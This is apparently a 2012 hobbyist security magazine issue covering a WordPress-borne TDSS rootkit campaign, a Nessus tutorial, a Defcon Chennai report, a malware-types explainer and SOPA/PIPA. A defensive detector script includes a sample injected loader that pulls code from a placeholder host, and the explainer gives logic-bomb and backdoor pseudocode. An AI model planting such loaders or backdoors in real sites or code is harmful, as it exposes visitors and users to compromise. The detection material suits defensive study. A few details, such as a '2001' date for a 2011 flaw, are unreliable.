

EDITORIAL

Hope you guys have enjoyed our last issue. ImHaker was a grand success in its first issue: massive downloads, feedback and suggestions too. I thank all you friends for this victory. Most of the readers wrote to us to increase the technical content. Since most of the hacking magazines are too complex for common people and n00bs, ImHaker changes the rule to make the content very clear to the common people. Think again: most of the cybercrimes take place whenever the user is not knowledgeable enough. So we make the content clear to all kinds of people. But we will get into the interior platform step by step as the readers evolve. However, as per your request we have added some technical content to this month’s issue. Enjoy this issue; send us more suggestions and feedback. - Gowtham

2 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


CONTENTS

What is inside ?!

Haker Events [ 04 ]

Hackers Distributing TDSS Rootkit [ 06 ]

Zscaler Launches Free URL Scanning Service [ 08 ]

Network Vulnerability Scanning [ 10 ]

Defcon Chennai, Jan 2012 [ 14 ]

Malware Variants Explained [ 20 ]

Report on Internet Censorship* [ 26 ]

Facebook Malwares Explained [ 36 ]

Fake Apps on Android [ 42 ]

Shortage of HDDs in Market 2012 [ 48 ]

Google TV Devices Updated [ 49 ]

Geek Jokes [ 50 ]

[*Cover Story]


HAKER EVENTS InfoSec Southwest 2012 When: Wednesday, 1 Feb 2012 Where: Austin, Texas http://www.infosecsouthwest.com/cfp.html

BugCON Security Conference ‘12 When: February 2 - 3, 2012 Where: Mexico City, Mexico http://www.bugcon.org

NDSS Symposium 2012 When: Sun, Feb 5, 2012 - Thu, Feb 9, 2012 Where: San Diego, California USA http://www.isoc.org/isoc/conferences/ndss/

EVENTS OF THE MONTH

ESSoS‘12 International Symposium When: 16 Feb 2012 - 17 Feb 2012 Where: Eindhoven, Netherlands http://goo.gl/EBPkh

13th Annual Privacy and Security Conference When: 16 February - 17 February 2012 Where: Victoria Conference Centre, BC, Canada http://www.rebootconference.com/privacy2012/

CODASPY’12 — Second ACM Conference on Data and Application Security and Privacy When: 08 Feb 2012 - 12 Feb 2012 Where: San Antonio, TX, United States http://www.codaspy.org/

SANS Secure India 2012 When: 20 Feb 2012 - 25 Feb 2012 Where: Bangalore, India http://www.sans.org/info/83954

SANS Phoenix 2012 When: February 13 - 18, 2012 Where: Phoenix, AZ http://www.sans.org/info/91511

RSA Conference 2012 When: Mon, Feb 27, 2012 - Sat, Mar 2, 2012 Where: San Francisco, California USA http://www.rsaconference.com/

Nullcon Goa 2012 When: February 15 - 18, 2012 Where: Goa, India http://www.nullcon.net/site/conference.php

You Shot The Sherif 6 (YSTS 6) When: Sunday, 26 Feb 2012 Where: Sao Paulo, Brazil http://www.ysts.org/



FC’12 Financial Cryptography and Data Security 2012 When: 27 Feb 2012 - 02 Mar 2012 Where: Bonaire, Netherlands Antilles http://fc12.ifca.ai/

SecurityXploded/null/G4H/Owasp When: 4th Feb 2012 Where: Bangalore, India http://securityxploded.com/

SANS Mobile Device Security Summit 2012 When: 12 Mar 2012 - 15 Mar 2012 Where: Nashville, United States http://www.sans.org/info/94424

Black Hat Europe 2012 When: March 14 - 16, 2012 Where: Amsterdam, The Netherlands http://www.blackhat.com/html/bh-eu-12/bheu-12-home.html

AtlSecCon 2012 When: Thu, Mar 1, 2012 - Sat, Mar 3, 2012 Where: Halifax, Canada http://atlseccon.com/

CFP Deadline: BRUCON When: Thursday, 15 Mar 2012 Where: Aula Academica of the Ghent, Belgium http://blog.brucon.org/2012/01/cfpcft-is-openstart-submitting-your.html

SANS Secure Singapore 2012 When: 05 Mar 2012 - 17 Mar 2012 Where: Singapore, Singapore http://www.sans.org/info/84259

SANS Germany 2012 When: 05 Mar 2012 - 10 Mar 2012 Where: Stuttgart, Germany http://www.sans.org/info/92184

CanSecWest 2012 When: 7 – 9 Mar 2012 Where: Sheraton Wall Centre, Canada http://cansecwest.com/

SecureIT 2012 When: Sun, Mar 18, 2012 - Wed, Mar 21, 2012 Where: Ontario, California USA http://www.secureitconf.com/

SANS 2012 When: Fri, Mar 23, 2012 - Sat, Mar 31, 2012 Where: Orlando, Florida USA http://www.sans.org

InfoSec Southwest 2012 When: 30 Mar – 1 Apr 2012 Where: Austin, Texas, USA http://www.infosecsouthwest.com/



HAKER NEWS

HACKERS DISTRIBUTING TDSS ROOTKIT ! VULNERABILITY IN WORDPRESS 3.2.1

Hackers are compromising WordPress blogs in order to infect their visitors with the infamous TDSS rootkit, according to researchers from Web security firm Websense. Compromised WordPress 3.2.1 blogs infect visitors with the TDSS rootkit through Java exploits. It’s not clear how the websites are being compromised, but there are publicly known exploits for vulnerabilities that affect WordPress 3.2.1, which is an older version of the popular blog publishing platform. Once they gain unauthorized access to a blog, the attackers inject malicious JavaScript code into its pages in order to load a Java exploit from a third-party server. “From our analysis the number of infections is growing steadily (100+),” said Websense principal security researcher Stephan Chenette in a blog post.

The company’s research into this mass code injection campaign indicates that whoever is behind it is experienced. The Java vulnerability exploited in the attack is known as CVE-2011-3544 and allows the remote execution of arbitrary code. In this case, the attackers are leveraging it to install a version of the TDSS rootkit on the computers of people visiting the website. “The TDSS rootkit is one of the stealthiest rootkits in the wild. Its goal is to acquire total control of infected PCs and use them as zombies for its botnet.” The CVE-2011-3544 vulnerability started being targeted by most exploit toolkits in December 2001. These attack frameworks usually contain exploits for vulnerabilities in several software products like Adobe Reader, Flash Player and Java.



The Websense researchers are not sure whether this mass code injection campaign uses an updated toolkit or an entirely new one, but experts from security firm M86 Security have tied recent WordPress 3.2.1 compromises to the Phoenix Exploit Kit. The people behind these attacks lure victims to the infected websites by sending them spam emails that contain malicious links. The fact that these links lead to genuine blogs helps the attackers bypass URL reputation filters. It’s not clear whether the attacks analyzed by M86 Security and Websense are perpetrated by the same gang, but since they both target WordPress 3.2.1 blogs, webmasters are urged to upgrade to the latest version of WordPress, which at this time is 3.3.1. In order to protect themselves from exploits, Web users should keep the software installed on their computers up to date, especially their OS, browser and browser plug-ins.
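As an added example, written for this article and not code from Websense or WordPress, the Python script below checks a saved copy of a blog page for the kind of injection described here: script tags loading from hosts other than the blog's own, inline scripts that document.write an iframe or applet, and Java applet/object embeds. The sample page and its host names are constructed placeholders.

```python
"""Find injected script loaders and Java embeds in a saved WordPress page.

Added example (not from the article, Websense or WordPress): given the HTML
of a blog page, list external <script src> hosts that are not the blog's
own, inline scripts that document.write() an iframe/applet, and any Java
applet/object embeds. Host names in the sample are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page: two legitimate theme scripts followed by an
# injected third-party loader, an inline writer and a 1x1 Java applet.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="http://blog.example.com/wp-content/themes/twentyten/js/menu.js"></script>
<script src="http://third-party.example.net/js/loader.js"></script>
<script>document.write(unescape('%3Ciframe src=%22http://third-party.example.net/x%22 width=1 height=1%3E%3C/iframe%3E'))</script>
</head><body>
<p>Hello world</p>
<applet code="loader.class" archive="http://third-party.example.net/l.jar" width="1" height="1"></applet>
<object type="application/x-java-applet" width="1" height="1"><param name="code" value="loader.class"></object>
</body></html>"""

JAVA_MIME_TYPES = ("application/x-java-applet", "application/x-java-vm", "application/java")


class InjectedLoaderFinder(HTMLParser):
    """Collect (kind, detail) findings while walking the page."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = {h.lower() for h in trusted_hosts}
        self.findings = []
        self._script_body = None  # buffer for the <script> body being read

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script_body = []
            src = a.get("src")
            if src:
                host = urlparse(src).hostname
                # A relative src (no host) is served by the blog itself.
                if host and host.lower() not in self.trusted_hosts:
                    self.findings.append(("external-script", src))
        elif tag == "applet":
            self.findings.append(("java-applet", a.get("archive") or a.get("code", "")))
        elif tag in ("object", "embed"):
            mime = (a.get("type") or "").lower()
            if mime in JAVA_MIME_TYPES:
                self.findings.append(("java-object", mime))

    def handle_data(self, data):
        if self._script_body is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_body is not None:
            # Percent-decode so unescape('%3Ciframe...') tricks become visible.
            text = unquote("".join(self._script_body)).lower()
            if "document.write" in text and ("<iframe" in text or "<applet" in text):
                self.findings.append(("inline-writer", text[:60]))
            self._script_body = None


def find_injected_loaders(html, trusted_hosts):
    """Return findings for one page; an empty list means nothing suspicious."""
    parser = InjectedLoaderFinder(trusted_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


def finding_kinds(html, trusted_hosts):
    """Just the finding kinds, in document order, for quick triage."""
    return [kind for kind, _ in find_injected_loaders(html, trusted_hosts)]


if __name__ == "__main__":
    for kind, detail in find_injected_loaders(SAMPLE_PAGE, ["blog.example.com"]):
        print(f"{kind:16} {detail}")
```

Run it over the HTML as served to visitors (not the theme files on disk), because injected code is often added at render time.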

A website asking the user for permission to run a malicious Java runtime in the web browser.

If you think your computer is affected by this malware, download the removal tool from Kaspersky Lab. Kaspersky Lab developed a removal tool specifically to remove the TDSS rootkit; get it from the website below: http://support.kaspersky.com/faq/?qid=208280684




HAKER NEWS

Zscaler launches free URL scanning service http://zulu.zscaler.com/

Cloud security vendor Zscaler has launched a new free-to-use online service called Zulu that can assess the security risk associated with URLs by analyzing the content they point to, as well as the reputation of their corresponding domain names and IP addresses. There are several free URL scanning services available online and all of them are useful in their own right. While conceptually similar to other such scanners, Zulu does have a few features that make it stand out. For example, Zulu allows security-savvy users who investigate various Web attacks to choose what User-Agent and Referrer headers the scanner will use when accessing a URL. There are a lot of attack pages that only serve malicious content to visitors who arrive there from a certain website, most commonly a search engine, or only to visitors who use a certain browser. Zulu assesses the risk of a Web resource’s content, its URL and host individually and assigns a score for each of these categories based on several tests. The scores are then combined to determine the overall risk associated with the resource.



A unique benefit of this approach is that we can deliver a risk score even when the page content is no longer available. While we can’t access the page, we can still assess the URL and host and when they deliver a high risk score despite a lack of page content, one can often conclude the page was indeed malicious but has since been taken down. Depending on the type of content a URL points to, Zulu can perform an antivirus scan using the VirusTotal multi-engine service, try to match a file’s MD5 hash in Zscaler’s database, search for known JavaScript obfuscation patterns and phishing heuristics, or use the company’s malware detection technologies.

A Web resource’s URL is verified against publicly known blacklists and its domain name is checked for suspicious strings of characters. The historical abuse levels of a particular TLD and the risk associated with an IP address’ geographical location are also taken into consideration when establishing the final risk score. According to the researcher, the company decided to launch Zulu as a free tool in order to experiment with new detection techniques before using them in its commercial products. As the service gains popularity, it will also help Zscaler discover more malicious websites and improve the accuracy of its database. But Zscaler doesn’t have any plans to offer an open API (application programming interface) for the service at this time.




HAKER LAB

NETWORK VULNERABILITY SCANNING BASIC NETWORK HOST SCAN USING NESSUS

Nessus is a proprietary network vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example, it can detect vulnerabilities that allow a remote cracker to control or access sensitive data on a system; misconfigured systems; default passwords, a few common passwords, and blank/absent passwords on some system accounts (Nessus can also call Hydra, an external tool, to launch a dictionary attack); denial of service against the TCP/IP stack by using mangled packets; and preparation for PCI DSS audits. This article shall endeavour to cover the basics of Nessus scanning.

Download and install Nessus from the official website, http://www.tenable.com/products/nessus. After installation you’ll have two shortcuts on the desktop: the Nessus Client and the Nessus Server. First run the Nessus Server, click on the “obtain activation code” button and get the activation code for the Professional Feed (if you want to use Nessus for corporate use) or the Home Feed (if you want to use Nessus for home use). Get the activation code and activate Nessus.


Before starting the Server, update the plugins. After the update, add a user with the username and password you wish and then run the server. Now run the Nessus Client from your desktop. Enter the username and password you created in the server.



HAKER LAB

Now you will be redirected to the home page of the Nessus Scanner. At the top of the page you can see a menu. Click on Scans, and in the Scans page click on Add. In the Add Scan menu, give the scan a name as you wish. Select the type “Run now”. Select a policy as you wish. Four Nessus scan policy templates appear in the “Policies” tab:

Add scan page in Nessus

Scan in progress

External Network Scan - This policy is tuned to scan externally facing hosts, which typically present fewer services to the network. Also, all 65,535 ports are scanned for on the target.

Internal Network Scan - This policy is tuned for better performance, taking into account that it may be used to scan large internal networks with many hosts, several exposed services, and embedded systems such as printers.

Web App Tests - If you want to scan your systems and have Nessus detect both known and unknown vulnerabilities in your web applications, this is the scan policy for you. The scan includes XSS, SQL injection, command injection and several more.

Prepare for PCI DSS audits - This policy enables the built-in PCI DSS compliance checks that compare scan results with the PCI standards and produces a report on your compliance posture.

In the target box enter the IP addresses of the hosts you wish to scan. You can scan more than one host at a time, so add all the IP addresses of the target systems, one IP per line. You can also upload a *.nessus file that contains the list of all targets using the “Targets file” option. Then click on “Launch scan” at the bottom of the screen.

Now you will see the scanning progress bar and the percentage of completion. After completion, double-clicking the link opens a page which contains the report about the target.

You can view a condensed report by applying some filters, and download the detailed report about the target as a *.nessus, *.HTML or *.rtf file.


That’s it for now, friends; you have successfully completed the network vulnerability test using Nessus. We will discuss detailed scanning in future issues.
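As an added example (written for this article, not Nessus's own tooling), the Python script below reads a *.nessus export of the kind downloaded in the last step, in the NessusClientData_v2 XML layout, and summarises the findings per host and severity so a scan can be triaged without the web UI. The hosts, plugin IDs and plugin names in the sample are constructed placeholders.

```python
"""Summarise a Nessus v2 (.nessus) export by host and severity.

Added example, not part of the article or of Nessus itself. It reads the
XML layout Nessus writes (NessusClientData_v2 / Report / ReportHost /
ReportItem) and counts findings per host and severity. The hosts, plugin
IDs and plugin names below are constructed placeholders.
"""
import xml.etree.ElementTree as ET
from collections import Counter

# Severity attribute values used on ReportItem elements.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export for two scanned hosts (placeholder addresses).
SAMPLE_REPORT = """<?xml version="1.0" ?>
<NessusClientData_v2>
<Report name="Basic host scan">
 <ReportHost name="192.0.2.10">
  <HostProperties>
   <tag name="host-ip">192.0.2.10</tag>
   <tag name="operating-system">Placeholder OS</tag>
  </HostProperties>
  <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
              pluginID="900001" pluginName="SSH Service Detection (placeholder)"/>
  <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
              pluginID="900002" pluginName="Web Server Weak Setting (placeholder)"/>
  <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
              pluginID="900003" pluginName="File Sharing Service Flaw (placeholder)">
   <description>Placeholder finding text.</description>
  </ReportItem>
 </ReportHost>
 <ReportHost name="192.0.2.11">
  <HostProperties>
   <tag name="host-ip">192.0.2.11</tag>
  </HostProperties>
  <ReportItem port="0" svc_name="general" protocol="tcp" severity="1"
              pluginID="900004" pluginName="Host Information (placeholder)"/>
  <ReportItem port="3306" svc_name="mysql" protocol="tcp" severity="3"
              pluginID="900005" pluginName="Database Default Credentials (placeholder)"/>
 </ReportHost>
</Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Flatten every ReportItem into a dict; one dict per (host, finding)."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.findall("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "os": props.get("operating-system", "unknown"),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "service": item.get("svc_name", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID", ""),
                "plugin_name": item.get("pluginName", ""),
            })
    return findings


def count_by_host_and_severity(findings):
    """{host: {severity_name: count}} for a quick per-host overview."""
    table = {}
    for f in findings:
        name = SEVERITY_NAMES.get(f["severity"], "Unknown")
        table.setdefault(f["host"], Counter())[name] += 1
    return {h: dict(c) for h, c in table.items()}


def hosts_at_or_above(findings, min_severity):
    """Hosts with at least one finding of the given severity or worse, sorted."""
    return sorted({f["host"] for f in findings if f["severity"] >= min_severity})


def worst_finding(findings):
    """The single highest-severity finding (first one wins on ties)."""
    return max(findings, key=lambda f: f["severity"]) if findings else None


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_REPORT)
    for host, counts in count_by_host_and_severity(found).items():
        print(host, counts)
    w = worst_finding(found)
    print("worst:", w["host"], w["port"], w["plugin_name"])
```

To use it on a real export, read the file into a string and pass it to parse_nessus in place of SAMPLE_REPORT.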


HAKER LIVE !

DEFCON CHENNAI, JAN 2012 Information Security Meet

DEFCON Chennai, one of the leading information security conferences in Tamil Nadu, India, had its fourth meet on January 29, 2012 at Le Waterina Resort, Chennai, organized by Mr. Hari Krishnan and Mr. Vikneshvaran.

There were several presentations, and live hacking was demonstrated. The presentations were informative and raised awareness among the audience about avoiding potential hacking attacks in the wild.

Defcon Chennai is a group under DEFCON, the international hacking conference. The team has already held three information security conferences. For every meet they call for papers on their blog. The topics for paper presentations are not limited to any specific area.

The participants were members of various Indian hacking crews such as ICA, ICW, ICF, etc. And it is no surprise that we met other security media such as THN and EHN.

The meet was a grand success with nine speakers and 40-50 participants. The objective of the meet was to share the latest trends in the security platform and to meet new people to build a network for information security.

It was a surprise that Mr. Kaushal Sharma, one of the nine speakers, who presented a paper on “DuQu Malware”, was a high school student. The conference encourages youngsters to take part in the presentations. We saw some school students also participating in the conference.

The people from all over the country have attended the conference.

ImHaker has the full report on the entire conference with photographs.



All the participants and speakers waiting at the hall.

The Karma Hall, where the conference took place.

Welcome notes given by Mr. Hari Krishnan, one of the organizers of Defcon Chennai.



HAKER LIVE !

Mr.Aditya Gupta, “Android Exploitation for fun and profit”

Mr.Karthick, “Fuzzing for fun and profit”

Mr.Prateek Dwivedi, “Symlinking”



Mr.Amrinder Singh, “Wiimote”

Mr.Ravi Kumar, “Social Network Security” & “CSS attacks N’ cookie hijacking”

Mr.Kaushal Sharma, “DuQu Malware”



HAKER LIVE !

Mr.Abhinab, “GPRS Hacking”

Mr.Pranav Mishra, “Denial of Service & Revenge Concept Disclosure”

Mr.Sai Satish, Admin, Andrahackers.com



Vote of Thanks given by Mr.Viknesvaran, one of the organizers of Defcon Chennai.

Mr.Karthick was awarded as the “outstanding speaker”.

Courtesy: Mr.Arush Sal for photographs.

At the end of the presentations Mr.Sai Satish, the owner of Andrahackers.com and a member of ICW, gave a nice speech about website defacements. He urged hackers to avoid website defacements done only for fun and revenge, because they don’t benefit the country, and to do only things that are beneficial to the country. He donated 3000 INR to a welfare association, which educates children about open source and free software. The organization was initiated by Mr. Satheesh Kumar.


The vote of thanks was given by Mr.Viknesvaran. He thanked all the participants and speakers who made the conference a grand success.


MALWARE

Malware variants explained
Report on different malwares in the wild

Last month’s issue of ImHaker featured malware basics and its types. Here we describe briefly each malware type and its characteristics with examples. There are several malware variants in the wild, such as Logic Bomb, Trojan horse, Back Door, Virus, Worm, Rabbit, Spyware, Adware, Zombies and some hybrid malware which combines the characteristics of two or more malware types.

Logic Bomb: A logic bomb is a malware variant which consists of two parts:

A payload, which is an action to perform. The payload can be anything, but has the connotation of having a malicious effect.

A trigger, a boolean condition that is evaluated and controls when the payload is executed. The exact trigger condition is limited only by the imagination, and could be based on local conditions like the date, the user logged in, or the operating system version. Triggers could also be designed to be set off remotely, or be set off by the absence of an event.

Logic bombs can be inserted into existing code, or could be standalone. A simple parasitic example is shown below, with a payload that crashes the computer using a particular date as a trigger.

    !--legitimate code--!
    if day is Friday:
        crash computer
    !--legitimate code--!

Trojan horse: A Trojan horse is a program which purports to do some benign task, but secretly performs some additional malicious task. A classic example is a password-grabbing login program which prints authentic-looking “username” and “password” prompts, and waits for a user to type in the information. When this happens, the password grabber stashes the information away for its creator, and then prints out an “invalid password” message before running the real login program. The unsuspecting user thinks they made a typing mistake and re-enters the information, none the wiser. Trojan horses have been known about since at least 1972.

(e.g.) Generic.tfr!5EB4E2D36DBA Risk level: Low Date discovered: 2/4/2012


Back Door: A back door is any mechanism which bypasses a normal security check. Programmers sometimes create back doors for legitimate reasons, such as skipping a time-consuming authentication process when debugging a network server. As with logic bombs, back doors can be placed into legitimate code or be standalone programs. The example back door below bypasses a login authentication process: the hard-coded username is let in without the normal credential check.

    username = read_usr()
    password = read_pwd()
    if username is “h4ck0r”:
        return ALLOW_LOGIN
    if username and password are valid:
        return ALLOW_LOGIN
    else:
        return DENY_LOGIN

One special kind of back door is a RAT, which stands for Remote Administration Tool or Remote Access Trojan, depending on who’s asked. These programs allow a computer to be monitored and controlled remotely; users may deliberately install these to access a work computer from home, or to allow help desk staff to diagnose and fix a computer problem from afar. However, if malware surreptitiously installs a RAT on a computer, then it opens up a back door into that machine.

(e.g.) Backdoor.Whalfrost!gen Date discovered: 2/2/2012

Virus: A virus is malware that, when executed, tries to replicate itself into other executable code; when it succeeds, the code is said to be infected. Whenever the infected code runs, it can infect new code in turn. This self-replication into existing executable code is the key defining characteristic of a virus. When faced with more than one virus to describe, a rather pointless problem arises: there’s no agreement on the plural form of “virus.” The two leading contenders are “viruses” and “virii”; the latter form is often used by virus writers themselves, but it’s rare to see it used in the security community, who prefer “viruses”. Traditionally, viruses can propagate within a single computer, or may travel from one computer to another using human-transported media, like a DVD-ROM, memory card or USB flash drive. In other words, viruses don’t propagate via computer networks; networks are the domain of worms instead. However, the label “virus” has been applied to malware that would traditionally be considered a worm, and the term has been watered down in common usage to refer to any sort of self-replicating malware. Viruses can be caught in various stages of self-replication. A germ is the original form of a virus, prior to any replication. A virus which fails to replicate is called an intended.



MALWARE

This may occur as a result of bugs in the virus, or encountering an unexpected version of an operating system. A virus can be dormant, where it is present but not yet infecting anything - for example, a Windows virus can reside on a Unix-based file server and have no effect there, but can be exported to Windows machines.

Worm: A worm has several characteristics similar to a virus. The most important characteristic is that worms are self-replicating too, but the self-replication of a worm is distinct in two ways. First, worms are standalone, and do not rely on other executable code. Second, worms spread from machine to machine across networks. These days worms are the preferred malware variant for hackers. The malware which spreads through USB flash drives and memory cards is most likely to be a worm. These new age worms have the capability to steal the contact list from the infected computer and then attach themselves to email messages, i.e. they spread through the internet.

(e.g.) W32.Pilleuz!gen30 Date discovered: 02/01/2012

Rabbit: Rabbit is the term used to describe malware that multiplies rapidly. Rabbits may also be called bacteria, for largely the same reason. There are actually two kinds of rabbit. The first is a program which tries to consume all of some system resource, like disk space. A “fork bomb,” a program which creates new processes in an infinite loop, is a classic example of this kind of rabbit. These tend to leave painfully obvious trails pointing to the perpetrator, and are not of particular interest. The second kind of rabbit, which the characteristics above describe, is a special case of a worm. This kind of rabbit is a standalone program which replicates itself across a network from machine to machine, but deletes the original copy of itself after replication. In other words, there is only one copy of a given rabbit on a network; it just hops from one computer to another. Rabbits are rarely seen in practice.

Spyware: Spyware is software which collects information from a computer and transmits it to someone else. The exact information spyware gathers may vary, but can include anything which potentially has value:



1. Usernames and passwords. These might be harvested from files on the machine, or by recording what the user types using a key logger. A keylogger differs from a Trojan horse in that a keylogger passively captures keystrokes only; no active deception is involved.
2. Email addresses, which would have value to a spammer.
3. Bank account and credit card numbers.
4. Software license keys, to facilitate software pirating.

Viruses and worms may collect similar information, but are not considered spyware, because spyware doesn’t self-replicate. Spyware may arrive on a machine in a variety of ways, such as bundled with other software that the user installs, or by exploiting technical flaws in web browsers. The latter method causes the spyware to be installed simply by visiting a web page, and is sometimes called a drive-by download.

Adware: Adware has similarities to spyware in that both gather information about the user and their habits. Adware is more marketing-focused, and may pop up advertisements or redirect a user’s web browser to certain web sites in the hopes of making a sale. Some adware will attempt to target the advertisement to fit the context of what the user is doing. For example, a search for “Robot” may result in an unwanted pop-up advertisement for “books about Robot”. Adware may also gather and transmit information about users which can be used for marketing purposes. As with spyware, adware does not self-replicate.

Hybrids, Droppers, and Blended Threats: The exact type of malware encountered in practice is not necessarily easy to determine, even given these loose definitions of malware types. The nature of software makes it easy to create hybrid malware which has characteristics belonging to several different types. You can find typical hybrid malware spreading through BitTorrent and P2P networks in the wild.

There are other combinations of malware too. For example, a dropper is malware which leaves behind, or drops, other malware. A worm can propagate itself, depositing a Trojan horse on all computers it compromises; a virus can leave a back door in its wake. A blended threat is a virus that exploits a technical vulnerability to propagate itself, in addition to exhibiting “traditional” characteristics. This has considerable overlap with the definition of a worm, especially since many worms exploit technical vulnerabilities. These technical vulnerabilities have historically required precautions and defences distinct from those that anti-virus vendors provided, and this rift may account for the duplication in terms. The Internet worm was a blended threat, according to this definition.



MALWARE

Zombies: Computers that have been compromised can be used by an attacker for a variety of tasks that are unknown to the legitimate owner; computers used in this way are called zombies. The most common tasks for zombies are sending spam and participating in coordinated, large-scale denial-of-service attacks (DoS, DDoS). Sending spam violates the acceptable use policy of many Internet service providers, not to mention violating laws in some jurisdictions.

Sites known to send spam are also blacklisted, marking sites that engage in spam-related activity so that incoming email from them can be summarily rejected. It is therefore ill-advised for spammers to send spam directly, in a way that can be traced back to them and their machines. Zombies provide a windfall for spammers, because they are a free, throwaway resource: spam can be relayed through zombies, which obscures the spammer’s trail, and a blacklisted zombie machine costs the spammer nothing. As for denial of service, one type of denial-of-service attack involves either flooding a victim’s network with traffic, or overwhelming a legitimate service on the victim’s network with requests. Another issue is how to control zombie networks. One method involves zombies listening for commands on Internet Relay Chat (IRC) channels, which provides a relatively anonymous, scalable means of control.

Typical DDoS attack illustrated.

When this is used, the zombie networks are referred to as botnets, named after automated IRC client programs called bots.



FAKE AVs: Fake AVs are malware programs that are skinned to look like an anti-malware program. This type of malware ruled the cyber world in the years 2009-10. This malware was programmed well and designed well to make the user believe it is an anti-virus program. It targets innocent n00b users and spreads through drive-by download. The screenshot below shows a website that illustrates a fake scan inside the browser window, made to look like the real thing using CSS.

If the user clicks the install link, it will automatically drop a payload from a remote server that installs the actual malware when it is executed by the user. This fake AV repeatedly shows false messages with a fake scanning mechanism and forces the user to buy the fake product. Innocent users who click the buying link will lose their money, which profits the malicious programmer. The new malwares in the wild are more intelligently programmed and are hybrids of all these malware types. The new age malwares are programmed to affect different platforms such as web browser add-ons, mobile apps and scripts. We will discuss the entire malware world in future issues.




COVER STORY

STOP ONLINE PIRACY ACT & Protect Intellectual Property Act (SOPA/PIPA) Detailed report on internet censorship

This January, the entire cyber world has been abuzz with SOPA (the “Stop Online Piracy Act”) and PIPA (the “Protect Intellectual Property/IP Act”). Most of the internet giants opposed these two acts, which threaten to put an end to the way we share and express ourselves on the internet. On Wednesday, January 18, Wikipedia went to the extent of blacking out their entire site for a period of 24 hours, along with other websites such as Mozilla, Google, Reddit, eBay, Wired and ~7000 other smaller websites. Most of us know and understand that SOPA & PIPA will bring heavy censorship on internet sharing; however, this article will give some details about how these two acts would work, and what the problems with these acts are. Websites that provide and share links to, or host, pirated files often spring up in a wide range of places, away from US authority. But the Justice Department could ask internet providers to block such websites. Even search engines like Google could be asked to exclude search results from blocked websites. Credit card companies and payment gateways like PayPal could be asked to block payments, and companies could be prohibited from placing ads on such sites.


The primary supporters of SOPA are copyright holders and industry bodies such as the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA), and ~350 other businesses and organizations including NBC Universal, Pfizer, Ford Motor Company, Revlon, NBA, Macmillan US, Business Software Alliance, Information Technology and Innovation Foundation, and Entertainment Software Association. Recently, GoDaddy, one of the top web hosting services, also stated that it supports SOPA.

Christopher Dodd, Chairman of the MPAA.

You may think, what’s the problem with that? Wouldn’t blocking piracy websites be good? Now think about this: who defines what constitutes pirated content? Would simply talking about a pirated movie on your blog be construed as promotion of piracy? What about a situation where a website is unknowingly hosting pirated content? For instance, file sharing websites have user-uploaded content. Their terms and conditions may clearly state that sharing of pirated content is illegal, and they are constantly taking down offending material and blocking users. But it’s impossible to monitor millions of users in real time. Should the file-sharing service be penalized for what the users upload? Similarly, many websites that you use (like Facebook, Twitter or Google services) rely on user content. SOPA proposes up to a five-year prison term for those found guilty of piracy or counterfeiting goods (for the first offence, if found guilty of streaming 10 pieces of copyrighted content within six months). The loose wording of the law states that the offending domain will be blocked. This is downright silly, as can easily be illustrated with these examples: if a single blog on BlogSpot or WordPress is hosting copyrighted content, all our blogs on these two sites will be branded as illegal by the US government. If you owned a single blog hosted on Google’s BlogSpot and an unknown user (knowingly or unknowingly) posted or commented any copyrighted content on your blog, the entire BlogSpot will be taken down, and if anyone shares or posts the same on Facebook, Twitter, Google or similar websites, they can also get blocked, ultimately leading to their closure.


COVER STORY

Opposing SOPA are internet giants and organizations such as Google, Yahoo, YouTube, Facebook, Twitter, AOL, LinkedIn, eBay, Mozilla Corporation, Kaspersky Lab, Mojang AB, Roblox, Riot Games and Epic Games, Reddit, Wikipedia, the Wikimedia Foundation, Reporters Without Borders, the Electronic Frontier Foundation (EFF), the ACLU and Human Rights Watch. Most of these companies showed their protest by means of a website blackout.

Famous internet websites blacked out to protect the internet against SOPA/PIPA.



SOPA’s First Hunt: On January 19, 2012, Megaupload, one of the biggest file sharing websites, was shut down by the US Department of Justice and the Federal Bureau of Investigation. The US Department of Justice said it charged seven people and two corporations with running what it called an international organized criminal enterprise allegedly responsible for massive worldwide online piracy of numerous types of copyrighted works. The DoJ stated that through the company known as Megaupload.com and other related sites, the group generated more than $175 million in criminal proceeds and cost copyright holders more than half a billion dollars.

The US Department of Justice stated that “This action is among the largest criminal copyright cases ever brought by the United States and directly targets the misuse of a public content storage and distribution site to commit and facilitate intellectual property crime”. Specifically, Megaupload Limited and Vestor Limited were indicted by a grand jury in the Eastern District of Virginia and charged with engaging in a racketeering conspiracy, conspiring to commit copyright infringement, conspiring to commit money laundering and two substantive counts of criminal copyright infringement. The individuals each face a maximum penalty of 20 years in prison on the charge of conspiracy to commit racketeering, five years in prison on the charge of conspiracy to commit copyright infringement, 20 years in prison on the charge of conspiracy to commit money laundering and five years in prison on each of the substantive charges of criminal copyright infringement.




Kim Dotcom, the CEO of Megaupload.com, arrested along with other shareholders.

